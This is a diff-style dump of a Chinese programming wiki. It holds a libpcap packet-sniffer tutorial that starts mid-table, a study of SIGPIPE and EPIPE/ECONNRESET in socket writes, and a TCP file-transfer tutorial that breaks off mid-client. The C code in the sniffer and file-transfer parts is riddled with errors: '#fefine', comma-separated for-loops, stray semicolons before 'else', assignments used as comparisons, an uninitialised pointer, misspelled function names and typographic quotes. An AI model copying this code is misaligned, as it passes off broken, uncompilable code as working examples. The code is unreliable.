Destination Port 2 接收端端口号
|
||||
Sequence NO 4 本报文段所发送的第一个字节的序号
|
||||
ACk Number 4 期望收到的下一个报文段的序号
|
||||
DAta Offset 1/2 首部的长度
|
||||
Reserved 3/4 保留今后用
|
||||
Contol Bits 3/4 控制位
|
||||
Window 2 滑动窗口的大小
|
||||
Checksum 2 检验和
|
||||
Urgent Pointer 2 紧急指针
|
||||
Options And Padding 4 可选,真充项
|
||||
Tcp被使用在跨越路由器进行网络服务的网络应用程序中,如WWW、电子邮件、新闻、FTP等。UDP则是在IP的基础上加入了端口的概念,其结构很简单,只有八个字节首部如下:
|
||||
源端口(2字节)->目的端口(2字节)->长度(2字节)->检验和(2字节)
|
||||
|
||||
二、程序部分函数及数据结构说明
|
||||
在此部分我们将介绍后面程序中用到的部分函数及数据结构。在程序中我们使用了PCAP程序库,大家可以从
|
||||
ftp://ftp.ee.lbl.gov/libpcap.tar.z%E4%B8%8B%E8%BD%BD%E3%80%82%E6%88%91%E4%BB%AC%E4%B8%BB%E8%A6%81%E5%9C%A8Redhat Linux下测试程序,这里简单介绍一下程序库的安装方法,其它环境请大家自行解决。我的目的是给大家编写数据包分析程序提供思路,至于实用程序的实现这里不做介绍,第三部分给出的程序也不具实用性,为了演示,程序中实现的功能较多而有些地方又不够详细,编写实用程序时请适当取舍并加入你所需要的功能实现部分。PCAP程序库的安装方法如下:
|
||||
1、解压文件
|
||||
2、进入文件目录执行./configure 及make
|
||||
3、使用Make命令,设定手册和Include文件(要有Root权限),执行以下命令:
|
||||
make install -man
|
||||
make install -incl
|
||||
4、如出现不存在Include及Include/net目录,则建立此目录并重新执行 make install -incl
|
||||
5、检查/usr/include/netinet/目录是否存在Protocols.h文件,不存在则拷贝过去。至此程序库安装完毕。
|
||||
下面介绍程序中出现的部分函数及数据结构:
|
||||
1、PCAP_t *pd;
|
||||
此型数据结构称为数据包捕捉描述符。
|
||||
2、Pcap_Open_Live(argv[1],DEFAUT_SNALEN,1,1000,ebuf)
|
||||
此函数对Pcap程序库进行初始化并返回指向Pcap_t型数据的指针,其参数列表如下:
|
||||
char * 指定网络接口
|
||||
int 取得数据的最大字节数
|
||||
int 指定网络接口卡,一般用1
|
||||
int 读出暂停时间
|
||||
char * 错误消息用缓冲区
|
||||
3、Pcap_loop(pd,-1,packet_proce,NUll)
|
||||
此函数程序的核心,反复执行,利用Pcap取得数据包,返回的是读入数据包的个数,错误时返回-1,其参数列表如下:
|
||||
Pcap_t * 指定取得数据包的数据包捕捉描述符
|
||||
int 取得数据包的个数,-1为无限
|
||||
返回指向函数的指针 指定数据包处理的函数
|
||||
U_char * 指向赋给数据包处理函数字符串的指针
|
||||
4、struct ether_header * eth
|
||||
此结构体存储以太网报头信息,其成员如下:
|
||||
ether_dhost[6] 接收端的MAC地址
|
||||
ether_shost[6] 发送端的MAC地址
|
||||
ether_type 上层协议的种类
|
||||
5、fflush(stdout)
|
||||
此函数完成的是强制输出,参数Stdout,强制进行标准输出。
|
||||
6、noths(((struct ether_header *P)->ether_type))
|
||||
此函数将短整型网络字节顺序转换成主机字节顺序。此类函数还有:
|
||||
ntohl 长整型 功能同上
|
||||
htons 短整型 将主机字节顺序转换成网络字节顺序
|
||||
htons 长整型 同上
|
||||
7、struct IP *iph
|
||||
ip型结构体在IPh文件中定义,其成员和第一部分讲到的IP数据报结构对应,如下:
|
||||
成员名 类型 说明
|
||||
ip_hl 4位无符号整数 报头长度
|
||||
ip_v 同上 版本,现为4
|
||||
ip_tos 8位无符号整数 Type of service
|
||||
ip_len 16位无符号整数 数据报长度
|
||||
ip_id 同上 标识
|
||||
ip_off 同上 数据块偏移和标志
|
||||
ip_ttl 8位无符号整数 TTL值
|
||||
ip_p 同上 上层协议
|
||||
ip_sum 16位无符号整数 检验和
|
||||
ip_src in_addr结构体 发送端IP
|
||||
ip_dst 同上 接收端IP
|
||||
8、struct ether_arp *arph
|
||||
ether_arp型结构体成员如下:
|
||||
成员名 类型 说明
|
||||
ea_hdr arphdr型结构体 报头中地址以外的部分
|
||||
arp_sha 8位无符号整数数组 发送端MAC地址
|
||||
arp_spa 同上 发送端IP地址
|
||||
arp_tha 同上 目标MAC地址
|
||||
arp_tpa 同上 目标IP地址
|
||||
9、struct icmphdr * icmp
|
||||
icmphdr型结构体中包含共用体根据数据报类型的不同而表现不同性质,这里不再列出,只列能通用的三个成员
|
||||
成员名 说明
|
||||
type 类型字段
|
||||
code 代码
|
||||
checksum 检验和
|
||||
|
||||
三、案例程序剖析
|
||||
//example.c
|
||||
//使用方法:example〈网络接口名〉 > 〈输出文件名〉
|
||||
//例如:example etho > temp.txe
|
||||
//结束方法:ctrl+c
|
||||
//程序开始,读入头文件
|
||||
#include<stdio.h>
|
||||
#include<sys/types.h>
|
||||
#include<sys/socket.h>
|
||||
#include<netinet/in.h>
|
||||
#include<netinet/in_systm.h>
|
||||
#include<netinet/ip.h>
|
||||
#include<netinet/if_ether.h>
|
||||
#include<pcap.h> //pcap程序库
|
||||
#include<netdb.h> //DNS检索使用
|
||||
#define MAXSTRINGSIZE 256 //字符串长度
|
||||
#define MAXSIZE 1024 //主机高速缓存中的最大记录条数
|
||||
#fefine DEFAULT_SNAPLEN 68 /数据包数据的长度
|
||||
typedef struct
|
||||
{
|
||||
unsigned long int ipaddr; //IP地址
|
||||
char hostname[MAXSTRINGSIZE]; //主机名
|
||||
}dnstable; //高速缓存数据结构
|
||||
typedef struct
|
||||
{
|
||||
dnstable table[MAXSIZE];
|
||||
int front;
|
||||
int rear;
|
||||
}sequeue;
|
||||
sequeue *sq; //定义缓存队列
|
||||
sq->rear=sq->front=0; //初始化队列
|
||||
//输出MAC地址函数
|
||||
void print_hwadd(u_char * hwadd)
|
||||
{
|
||||
for(int i=0,i<5;++i)
|
||||
printf("%2x:",hwadd[i]);
|
||||
printf("%2x",hwadd[i]);
|
||||
}
|
||||
//输出IP地址的函数
|
||||
void print_ipadd(u_char *ipadd)
|
||||
{
|
||||
for(int i=0;i<3;++i)
|
||||
printf("%d.",ipadd[i]);
|
||||
printf("%d",ipadd[i]);
|
||||
}
|
||||
//查询端口函数
|
||||
void getportname(int portno,char portna[],char* proto)
|
||||
{
|
||||
if(getservbyport(htons(portno),proto)!=NULL)
|
||||
{
|
||||
strcpy(portna,getservbyport(htons(portno),proto)->s_name);
|
||||
}
|
||||
else
|
||||
sprintf(portna,"%d",portno);
|
||||
}
|
||||
//将IP转化为DNS名
|
||||
void iptohost(unsigned long int ipad,char* hostn)
|
||||
{
|
||||
struct hostent * shostname;
|
||||
int m,n,i;
|
||||
m=sq->rear;
|
||||
n=sq->front;
|
||||
for(i=n%MAXSIZE;i=m%MAXSIZE;i=(++n)%MAXSIZE)
|
||||
{
|
||||
//检查IP是否第一次出现
|
||||
if(sq->table[i].ipaddr==ipad)
|
||||
{
|
||||
strcpy(hostn,sq->table[i].hostname);
|
||||
break;
|
||||
}
|
||||
}
|
||||
if(i=m%MAXSIZE)
|
||||
{//不存在则从域名服务器查询并把结果放入高速缓存
|
||||
if((sq->rear+1)%MAXSIZE=sq->front) //判队满
|
||||
sq->front=(sq->front+1)%MAXSIZE; //出队列
|
||||
sq->table[i].ipaddr=ipad;
|
||||
shostname=gethostbyaddr((char*)&ipad,sizeof(ipad),AF_INET);
|
||||
if(shostname!=NULL)
|
||||
strcpy(sq->table[i].hostname,shostname->h_name);
|
||||
else
|
||||
strcpy(sq->table[i].hostname,"");
|
||||
sq->rear=(sq->rear+1)%MAXSIZE;
|
||||
}
|
||||
}
|
||||
void print_hostname(u_char* ipadd)
|
||||
{
|
||||
unsigned long int ipad;
|
||||
char hostn[MAXSTRINTSIZE];
|
||||
ipad=*((unsigned long int *)ipadd);
|
||||
iptohost(ipad,hostn)
|
||||
if(strlen(hostn)>0)
|
||||
printf("%s",hostn);
|
||||
else
|
||||
print_ipadd(ipadd);
|
||||
}
|
||||
//处理数据包的函数
|
||||
void packet_proce(u_char* packets,const struct pcap_pkthdr * header,const u_char *pp)
|
||||
{
|
||||
struct ether_header * eth; //以太网帧报头指针
|
||||
struct ether_arp * arth; //ARP报头
|
||||
struct ip * iph; //IP报头
|
||||
struct tcphdr * tcph;
|
||||
struct udphdr * udph;
|
||||
u_short srcport,dstport; //端口号
|
||||
char protocol[MAXSTRINGSIZE]; //协议类型名
|
||||
char srcp[MAXSTRINGSIZE],dstp[MAXSTRINGSIZE]; //端口名
|
||||
unsigned int ptype; //协议类型变量
|
||||
u_char * data; //数据包数据指针
|
||||
u_char tcpudpdata[MAXSTRINGSIZE]; //数据包数据
|
||||
int i;
|
||||
eth=(struct ether_header *)pp;
|
||||
ptype=ntohs(((struct ether_header *)pp)->ether_type);
|
||||
if((ptype==ETHERTYPE_ARP)||(ptype==ETHERTYPE_RARP))
|
||||
{
|
||||
arph=(struct ether_arp *)(pp+sizeof(struct ether_header));
|
||||
if(ptype==ETHERTYPE_ARP)
|
||||
printf("arp ");
|
||||
else
|
||||
printf("rarp "); //输出协议类型
|
||||
print_hwadd((u_char *)&(arph->arp_sha));
|
||||
printf("(");
|
||||
print_hostname((u_char *)&(arph->arp_spa));
|
||||
printf(")->");
|
||||
print_hwadd((u_char *)&(arph->arp_tha));
|
||||
printf("(");
|
||||
print_hostname((u_char *)&(arph->arp_tpa));
|
||||
printf(")\tpacketlen:%d",header->len);
|
||||
}
|
||||
else if(ptype==ETHERTYPE_IP) //IP数据报
|
||||
{
|
||||
iph=(struct ip *)(pp+sizeof(struct ether_header));
|
||||
if(iph->ip_p==1) //ICMP报文
|
||||
{
|
||||
strcpy(protocol,"icmp");
|
||||
srcport=dstport=0;
|
||||
}
|
||||
else if(iph->ip_p==6) //TCP报文
|
||||
{
|
||||
strcpy(protocol,"tcp");
|
||||
tcph=(struct tcphdr *)(pp+sizeof(struct ether_header)+4*iph->ip_hl);
|
||||
srcport=ntohs(tcph->source);
|
||||
dstport=ntohs(tcph->dest);
|
||||
data=(u_char *)(pp+sizeof(struct ether_header)+4*iph->ip_hl+4*tcph->doff);
|
||||
for(i=0;i<MAXSTRINGSIZE-1;++i)
|
||||
{
|
||||
if(i>=header->len-sizeof(struct ether_header)-4*iph->ip_hl-4*tcph->doff);
|
||||
break;
|
||||
else
|
||||
tcpudpdata[i]=data[i];
|
||||
}
|
||||
} //TCP数据处理完毕
|
||||
else if(iph->ip_p=17) //UDP报文
|
||||
{
|
||||
strcpy(protocol,"udp");
|
||||
udph=(struct udphdr *)(pp+sizeof(struct ether_header)+4*iph->ip_hl);
|
||||
srcport=ntohs(udph->source);
|
||||
dstport=ntohs(udph->dest);
|
||||
data=(u_char *)(pp+sizeof(struct ether_header)+4*iph->ip_hl+8);
|
||||
for(i=0;i<MAXSTRINGSIZE-1;++i)
|
||||
{
|
||||
if(i>=header->len-sizeof(struct ether_header)-4*iph->ip_hl-8);
|
||||
break;
|
||||
else
|
||||
tcpudpdata[i]=data[i];
|
||||
}
|
||||
}
|
||||
tcpudpdata[i]='\0';
|
||||
getportname(srcport,srcp,protocol);
|
||||
getportname(dstport,dstp,protocol);
|
||||
printf("ip ");
|
||||
print_hwadd(eth->ether_shost);
|
||||
printf("(");
|
||||
print_hostname((u_char *)&(iph->ip_src));
|
||||
printf(")[%s:%s]->",protocol,srcp);
|
||||
print_hwadd(eth->ether_dhost);
|
||||
printf("(");
|
||||
print_hostname((u_char *)&(iph->ip_dst));
|
||||
printf(")[%s:%s]",protocol,dstp);
|
||||
printf("\tttl:%d packetlen:%d,iph->ttl,header->len);
|
||||
printf("\n");
|
||||
printf("%s",tcpudpdata);
|
||||
printf("==endpacket==");
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
//Main函数取数据包并初始化程序环境
|
||||
int main(int argc,char ** argv)
|
||||
{
|
||||
char ebuf[pcap_ERRBUF_SIZE];
|
||||
pcap * pd;
|
||||
if(argc<=1) //参数检查
|
||||
{
|
||||
printf("usage:%s<network interface>\n",argv[0]);
|
||||
exit(0);
|
||||
}
|
||||
//设置PCAP程序库
|
||||
if((pd=pcap_open_live(argv[1],DEFAULT_SNAPLEN,1,1000,ebuf))=NULL)
|
||||
{
|
||||
(void)fprintf(stderr,"%s",ebuf);
|
||||
exit(1);
|
||||
}
|
||||
//循环取数据包
|
||||
//改变参数-1为其它值,可确定取数据包的个数,这里为无限个
|
||||
if(pcap_loop(pd,-1,packet_proce,NULL)<0)
|
||||
{
|
||||
(void)fprintf(stderr,"pcap_loop:%s\n",pcap_geterr(pd));
|
||||
exit(1);
|
||||
}
|
||||
pcap_colse(pd);
|
||||
exit(0);
|
||||
}
|
||||
//程序结束
|
||||
208
Zim/Programme/APUE/Socket数据发送中信号SIGPIPE及相关errno的研究.txt
Normal file
@@ -0,0 +1,208 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T14:36:51+08:00
|
||||
|
||||
====== Socket数据发送中信号SIGPIPE及相关errno的研究 ======
|
||||
Created 星期六 04 六月 2011
|
||||
Socket数据发送中信号SIGPIPE及相关errno的研究
|
||||
好久没做过C开发了,最近重操旧业。
|
||||
听说另外一个项目组socket开发遇到问题,发送端和接受端数据大小不一致。建议他们采用writen的重发机制,以避免信号中断错误。采用后还是有问题。PM让我帮忙研究下。
|
||||
UNP n年以前看过,很久没做过底层开发,手边也没有UNP vol1这本书,所以做了个测试程序,研究下实际可能发生的情况了。
|
||||
|
||||
测试环境:AS3和redhat 9(缺省没有nc)
|
||||
|
||||
先下载unp源码:
|
||||
wget http://www.unpbook.com/unpv13e.tar.gz
|
||||
tar xzvf *.tar.gz;
|
||||
configure;make lib.
|
||||
然后参考str_cli.c和tcpcli01.c,写了测试代码client.c
|
||||
|
||||
|
||||
#include "unp.h"
|
||||
|
||||
#define MAXBUF 40960
|
||||
void processSignal(int signo)
|
||||
{
|
||||
printf("Signal is %d\n", signo);
|
||||
signal(signo, processSignal);
|
||||
}
|
||||
void
|
||||
str_cli(FILE *fp, int sockfd)
|
||||
{
|
||||
char sendline[MAXBUF], recvline[MAXBUF];
|
||||
|
||||
while (1) {
|
||||
|
||||
memset(sendline, 'a', sizeof(sendline));
|
||||
printf("Begin send %d data\n", MAXBUF);
|
||||
Writen(sockfd, sendline, sizeof(sendline));
|
||||
sleep(5);
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
int sockfd;
|
||||
struct sockaddr_in servaddr;
|
||||
|
||||
signal(SIGPIPE, SIG_IGN);
|
||||
//signal(SIGPIPE, processSignal);
|
||||
|
||||
if (argc != 2)
|
||||
err_quit("usage: tcpcli [port]");
|
||||
|
||||
sockfd = Socket(AF_INET, SOCK_STREAM, 0);
|
||||
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_port = htons(atoi(argv[1]));
|
||||
Inet_pton(AF_INET, "127.0.0.1", &servaddr.sin_addr);
|
||||
|
||||
Connect(sockfd, (SA *) &servaddr, sizeof(servaddr));
|
||||
|
||||
str_cli(stdin, sockfd); /* do it all */
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
|
||||
为了方便观察错误输出,lib/writen.c也做了修改,加了些日志:
|
||||
|
||||
|
||||
|
||||
/* include writen */
|
||||
#include "unp.h"
|
||||
|
||||
ssize_t /* Write "n" bytes to a descriptor. */
|
||||
writen(int fd, const void *vptr, size_t n)
|
||||
{
|
||||
size_t nleft;
|
||||
ssize_t nwritten;
|
||||
const char *ptr;
|
||||
|
||||
ptr = vptr;
|
||||
nleft = n;
|
||||
while (nleft > 0) {
|
||||
printf("Begin Writen %d\n", nleft);
|
||||
if ( (nwritten = write(fd, ptr, nleft)) <= 0) {
|
||||
if (nwritten < 0 && errno == EINTR) {
|
||||
printf("intterupt\n");
|
||||
nwritten = 0; /* and call write() again */
|
||||
}
|
||||
else
|
||||
return(-1); /* error */
|
||||
}
|
||||
|
||||
nleft -= nwritten;
|
||||
ptr += nwritten;
|
||||
printf("Already write %d, left %d, errno=%d\n", nwritten, nleft, errno);
|
||||
}
|
||||
return(n);
|
||||
}
|
||||
/* end writen */
|
||||
|
||||
void
|
||||
Writen(int fd, void *ptr, size_t nbytes)
|
||||
{
|
||||
if (writen(fd, ptr, nbytes) != nbytes)
|
||||
err_sys("writen error");
|
||||
}
|
||||
|
||||
|
||||
|
||||
client.c放在tcpclieserv目录下,修改了Makefile,增加了client.c的编译目标
|
||||
|
||||
|
||||
|
||||
|
||||
client: client.c
|
||||
${CC} ${CFLAGS} -o $@ $< ${LIBS}
|
||||
|
||||
|
||||
|
||||
接着就可以开始测试了。
|
||||
测试1 忽略SIGPIPE信号,writen之前,对方关闭接受进程
|
||||
|
||||
本机服务端:
|
||||
nc -l -p 30000
|
||||
|
||||
本机客户端:
|
||||
./client 30000
|
||||
Begin send 40960 data
|
||||
Begin Writen 40960
|
||||
Already write 40960, left 0, errno=0
|
||||
Begin send 40960 data
|
||||
Begin Writen 40960
|
||||
Already write 40960, left 0, errno=0
|
||||
执行到上步停止服务端,client会继续显示:
|
||||
Begin send 40960 data
|
||||
Begin Writen 40960
|
||||
writen error: Broken pipe(32)
|
||||
结论:可见write之前,对方socket中断,发送端write会返回-1,errno号为EPIPE(32)
|
||||
测试2 catch SIGPIPE信号,writen之前,对方关闭接受进程
|
||||
|
||||
修改客户端代码,catch sigpipe信号
|
||||
|
||||
//signal(SIGPIPE, SIG_IGN);
|
||||
|
||||
signal(SIGPIPE, processSignal);
|
||||
|
||||
本机服务端:
|
||||
nc -l -p 30000
|
||||
|
||||
本机客户端:
|
||||
make client
|
||||
./client 30000
|
||||
Begin send 40960 data
|
||||
Begin Writen 40960
|
||||
Already write 40960, left 0, errno=0
|
||||
Begin send 40960 data
|
||||
Begin Writen 40960
|
||||
Already write 40960, left 0, errno=0
|
||||
执行到上步停止服务端,client会继续显示:
|
||||
Begin send 40960 data
|
||||
Begin Writen 40960
|
||||
Signal is 13
|
||||
writen error: Broken pipe(32)
|
||||
结论:可见write之前,对方socket中断,发送端write时,会先调用SIGPIPE响应函数,然后write返回-1,errno号为EPIPE(32)
|
||||
|
||||
测试3 writen过程中,对方关闭接受进程
|
||||
|
||||
为了方便操作,加大1次write的数据量,修改MAXBUF为4096000
|
||||
|
||||
本机服务端:
|
||||
nc -l -p 30000
|
||||
|
||||
本机客户端:
|
||||
make client
|
||||
./client 30000
|
||||
Begin send 4096000 data
|
||||
Begin Writen 4096000
|
||||
执行到上步停止服务端,client会继续显示:
|
||||
Already write 589821, left 3506179, errno=0
|
||||
Begin Writen 3506179
|
||||
writen error: Connection reset by peer(104)
|
||||
|
||||
结论:可见socket write中,对方socket中断,发送端write会先返回已经发送的字节数,再次write时返回-1,errno号为ECONNRESET(104)
|
||||
|
||||
为什么以上测试,都是对方已经中断socket后,发送端再次write,结果会有所不同呢。从后来找到的UNP5.12,5.13能找到答案
|
||||
|
||||
The client's call to readline may happen before the server's RST is received by the client, or it may happen after. If the readline happens before the RST is received, as we've shown in our example, the result is an unexpected EOF in the client. But if the RST arrives first, the result is an ECONNRESET ("Connection reset by peer") error return from readline.
|
||||
|
||||
以上解释了测试3的现象,write时,收到RST.
|
||||
|
||||
What happens if the client ignores the error return from readline and writes more data to the server? This can happen, for example, if the client needs to perform two writes to the server before reading anything back, with the first write eliciting the RST.
|
||||
|
||||
The rule that applies is: When a process writes to a socket that has received an RST, the SIGPIPE signal is sent to the process. The default action of this signal is to terminate the process, so the process must catch the signal to avoid being involuntarily terminated.
|
||||
|
||||
If the process either catches the signal and returns from the signal handler, or ignores the signal, the write operation returns EPIPE.
|
||||
|
||||
以上解释了测试1,2的现象,write一个已经接受到RST的socket,系统内核会发送SIGPIPE给发送进程,如果进程catch/ignore这个信号,write都返回EPIPE错误.
|
||||
|
||||
因此,UNP建议应用根据需要处理SIGPIPE信号,至少不要用系统缺省的处理方式处理这个信号,系统缺省的处理方式是退出进程,这样你的应用就很难查处处理进程为什么退出。
|
||||
|
||||
原文地址 http://blog.chinaunix.net/u/31357/showart_242605.html
|
||||
|
||||
187
Zim/Programme/APUE/TCPIP编程实现远程文件传输.txt
Normal file
@@ -0,0 +1,187 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-20T17:01:46+08:00
|
||||
|
||||
====== TCPIP编程实现远程文件传输 ======
|
||||
Created Wednesday 20 April 2011
|
||||
http://bbs.chinaunix.net/thread-2278881-1-2.html
|
||||
TCP/IP编程实现远程文件传输
|
||||
|
||||
在TCP/IP网络结构中,为了保证网络安全,网络人员往往需要在路由器上添加防火墙,禁止非法用户用ftp等安全危害较大的TCP/IP协议访问主机。而有时系统维护人员需要用ftp将一些文件从中心机房主机传到前端网点主机上,比如应用程序的替换升级。如果每次传输文件时都要打开防火墙,未免显得有些繁琐,要是在自己的应用程序中增加一个专门的文件传输模块,那将是十分愉快的事情。
|
||||
|
||||
UNIX网络程序设计一般都采用套接字(socket)系统调用。针对目前十分流行的客户/服务器模式,其程序编写步骤如下:
|
||||
1.Socket系统调用
|
||||
为了进行网络I/O,服务器和客户机两端的UNIX进程要做的第一件事是调用socket()系统调用,建立软插座,指明合适的通讯协议。格式为:
|
||||
#include<sys/types.h>;
|
||||
#include<sys/socket.h>;
|
||||
int socket(int family,int type,int protocol)
|
||||
其中:(1)family指明套节字族,其值包括:
|
||||
AF_UNIX (UNIX内部协议族)
|
||||
AF_INET (Iternet协议)
|
||||
AF_NS (XeroxNs协议,TCP/IP编程取该值)
|
||||
AF_IMPLINK (IMP链接层)
|
||||
(2)type 指明套接字类型,取值有:
|
||||
SOCK_STREAM (流套接字)
|
||||
SOCK_DGRAM (数据报套接字)
|
||||
SOCK_RAW (原始套接字)
|
||||
SOCK_SEQPACKET (定序分组套接字)
|
||||
一般情况下,前两个参数的组合就可以决定所使用的协议,这时第三个参数被置为0,如果第一个参数为AF_INET,第二个参数选SOCK_STREAM,则使用的协议为TCP;第二个参数选SOCK_DGRAM,则使用的协议为UDP;当第二个参数选SOCK_RAW时,使用的协议为IP。值得指出的是并不是所有的族和类型的组合都是合法的,具体请查阅相关资料。该系统调用若成功则返回一个类似文件描述符,成为套节字描述字,可以像文件描述符那样用read和write对其进行I/O操作。当一个进程使用完该软插座时,需用close(<描述符>关闭(具体见后面内容)。
|
||||
2.服务器端Bind系统调用
|
||||
软插座创建时并没有与任何地址相关联,必须用bind()系统调用为其建立地址联系。其格式为:
|
||||
#include<sys/types.h>;
|
||||
#include<sys/socket.h>;
|
||||
int bind(int socketfd,struct sockaddr_in *localaddr,sizeof(localaddr));
|
||||
其中:(1)第一个参数socketfd是前步socket()系统调用返回的套节字描述符。
|
||||
(2)第二个参数被捆向本地地址的一种结构,该结构在sys/netinet/in.h中定义:
|
||||
struct sockaddr_in{
|
||||
short sin_family;/*socket()系统调用的协议族如AF_INET*/
|
||||
u_short sin_port;/*网络字节次序形式的端口号码*/
|
||||
struct in_addr sin_addr;/*网络字节次序形式的网络地址*/
|
||||
char sin_zero[8];
|
||||
}
|
||||
一台机器上的每个网络程序使用一个各自独立的端口号码,例如:telnet程序使用端口号23,而ftp文件传输程序使用端口号21。我们在设计应用程序时,端口号码可以由getservbyname()函数从/etc/services库文件中获取,也可以由htons (int portnum)函数将任意正整数转换为网络字节次序形式来得到,有些版本的UNIX操作系统则规定1024以下的端口号码只可被超级用户使用,普通用户程序使用的端口号码只限于1025到32767之间。网络地址可以由gethostbyname(char*hostname)函数得到(该函数和getservbyname()一样都以网络字节次序形式返回所有在他们结构中的数据),参数hostname为/etc/hosts文件中某一网络地址所对应的机器名。该函数返回一个类型为hostent的结构指针,hostent结构在netdb.h中定义:
|
||||
struct hostent{
|
||||
char *h_name;
|
||||
char **h_aliases;
|
||||
int h_addrtype;
|
||||
int h_length; /*地址长度*/
|
||||
char **h_addr_list;
|
||||
#define h_addr h_addr_list[0];/*地址*/
|
||||
}
|
||||
(3)第三个参数为第二个结构参数的长度,如果调用成功,bind返回0,否则将返回-1并设置errno。
|
||||
3.服务器端系统调用listen,使服务器愿意接受连接
|
||||
格式:int listen(int socketfd,int backlong)
|
||||
它通常在socket和bind调用后在accept调用前执行。第二个参数指明在等待服务器执行accept调用时系统可以排队多少个连接要求。此参数常指定为5,也是目前允许的最大值。
|
||||
4.服务器调用accept,以等待客户机调用connect进行连接。格式如下:
|
||||
int newsocket=(int socketfd,struct sockaddr_in *peer,int*addrlen);
|
||||
该调用取得队列上的第一个连接请求并建立一个具有与sockfd相同特性的套节字。如果没有等待的连接请求,此调用阻塞调用者直到一连接请求到达。连接成功后,该调用将用对端的地址结构和地址长度填充参数peer和addlen,如果对客户端的地址信息不感兴趣,这两个参数用0代替。
|
||||
5.客户端调用connect()与服务器建立连接。格式为:
|
||||
connect(int socketfd,struct sockaddr_in *servsddr,int addrlen)
|
||||
客户端取得套接字描述符后,用该调用建立与服务器的连接,参数socketfd为socket()系统调用返回的套节字描述符,第二和第三个参数是指向目的地址的结构及以字节计量的目的地址的长度(这里目的地址应为服务器地址)。调用成功返回0,否则将返回-1并设置errno。
|
||||
6.通过软插座发送数据
|
||||
一旦建立连接,就可以用系统调用read和write像普通文件那样向网络上发送和接受数据。Read接受三个参数:一个是套节字描述符;一个为数据将被填入的缓冲区,还有一个整数指明要读的字节数,它返回实际读入的字节数,出错时返回-1,遇到文件尾则返回0。Write也接受三个参数:一个是套节字描述符;一个为指向需要发送数据的缓冲区,还有一个整数指明要写入文件的字节个数,它返回实际写入的字节数,出错时返回-1。当然,也可以调用send和recv来对套节字进行读写,其调用与基本的read和write系统调用相似,只是多了一个发送方式参数。
|
||||
7.退出程序时,应按正常方式关闭套节字。格式如下:
|
||||
int close(socketfd)
|
||||
前面介绍了UNIX客户/服务器模式网络编程的基本思路和步骤。值得指出的是socket编程所涉及的系统调用不属于基本系统调用范围,其函数原形在libsocket.a文件中,因此,在用cc命令对原程序进行编译时需要带-lsocket选项。
|
||||
现在,我们可以针对文章开头提出的问题着手进行编程了。在图示的网络结构中,为使中心机房的服务器能和网点上的客户机进行通信,需在服务器端添加通过路由器1112到客户机的路由,两台客户机也必须添加通过路由器2221到服务器的路由。在服务器的/etc/hosts文件中应该包含下面内容:
|
||||
1.1.1.1 server
|
||||
2.2.2.2 cli1
|
||||
2.2.2.3 cli2
|
||||
客户机的/etc/hosts文件中应该有本机地址信息和服务器的地址信息,如cli1客户机的/etc/hosts文件:
|
||||
2.2.2.2 cli1
|
||||
1.1.1.1 server
|
||||
网络环境搭建好后,我们可以在服务器端编写fwq.c程序,负责接受客户机的连接请求,并将从源文件中读取的数据发送到客户机。客户机程序khj.c向服务器发送连接请求,接收从服务器端发来的数据,并将接收到的数据写入目标文件。源程序如下:
|
||||
/*服务器源程序fwq.c*/
|
||||
#include<stdio.h>;
|
||||
#include<sys/types.h>;
|
||||
#include<sys/fcntl.h>;
|
||||
#include<sys/socket.h>;
|
||||
#include<sys/netinet/in.h>;
|
||||
#include<netdb.h>;
|
||||
#include<errno.h>;
|
||||
main()
|
||||
{
|
||||
char c,buf[1024],file[30];
|
||||
int fromlen,source;
|
||||
register int k,s,ns;
|
||||
struct sockaddr_in sin;
|
||||
struct hostent *hp;
|
||||
system(″clear″);
|
||||
printf(″\n″);
|
||||
|
||||
printf(″\n\n\t\t输入要传输的文件名:″);
|
||||
scanf(″%s″,file);
|
||||
if ((source=open(file,O_RDONLY))<0){
|
||||
perror(″源文件打开出错″);
|
||||
exit(1);
|
||||
}
|
||||
printf(″\n\t\t在传送文件,稍候…″);
|
||||
hp=gethostbyname(″server″);
|
||||
if (hp==NULL){
|
||||
perror(″返回主机地址信息错!!!″);
|
||||
exit(2);
|
||||
}
|
||||
s=socket(AF_INET,SOCK_STREAM,0);
|
||||
if(s<0){
|
||||
perror(″获取SOCKET号失败!!!″);
|
||||
exit(3);
|
||||
}
|
||||
sin.sin_family=AF_INET;
|
||||
sin.sin_port=htons(1500);/*使用端口1500*/
|
||||
bcopy(hp->;h_addr,&sin.sin_addr,hp->;h_length);
|
||||
if(bind(s,&sin,sizeof(sin))<0){
|
||||
perror(″不能将服务器地址捆绑到SOCKET号上!!!″);
|
||||
colse(s);
|
||||
exit(4);
|
||||
}
|
||||
if(listen(s,5)<0{
|
||||
perror(″sever:listen″);
|
||||
exit(5);
|
||||
}
|
||||
while(1){
|
||||
if((ns=accept(s,&sin,&fromlen))<0){
|
||||
perror(″sever:accept″);
|
||||
exit(6);
|
||||
}
|
||||
lseek(source,OL,0);/*每次接受客户机连接,应将用于读的源文件指针移到文件头*/
|
||||
write(ns,file,sizeof(file)); /*发送文件名*/
|
||||
while((k=read(source,buf,sizeof(buf)))>;0)
|
||||
write(ns,buf,k);
|
||||
printf(″\n\n\t\t传输完毕!!!\n″);
|
||||
close(ns);
|
||||
}
|
||||
close(source);
|
||||
exit(0);
|
||||
/*客户机源程序khj.c*/
|
||||
#include<stdio.h>;
|
||||
#include<sys/types.h>;
|
||||
#include<sys/fcntl.h>;
|
||||
#include<sys/socket.h>;
|
||||
#include<sys/netinet/in.h>;
|
||||
#include<netdb.h>;
|
||||
#include<errno.h>;
|
||||
#include <string.h>;
|
||||
main()
|
||||
{
|
||||
char buf[1024],file[30];
|
||||
char *strs=″\n\n\t\t正在接收文件″;
|
||||
int target;
|
||||
register int k,s;
|
||||
struct sockaddr_in sin;
|
||||
struct hostent *hp;
|
||||
system(″clear″);
|
||||
printf(″\n″);
|
||||
|
||||
hp=gethostbyname(″server″);
|
||||
if(hp==NULL){
|
||||
perror(″返回服务器地址信息错!!!″);
|
||||
exit(1);
|
||||
}
|
||||
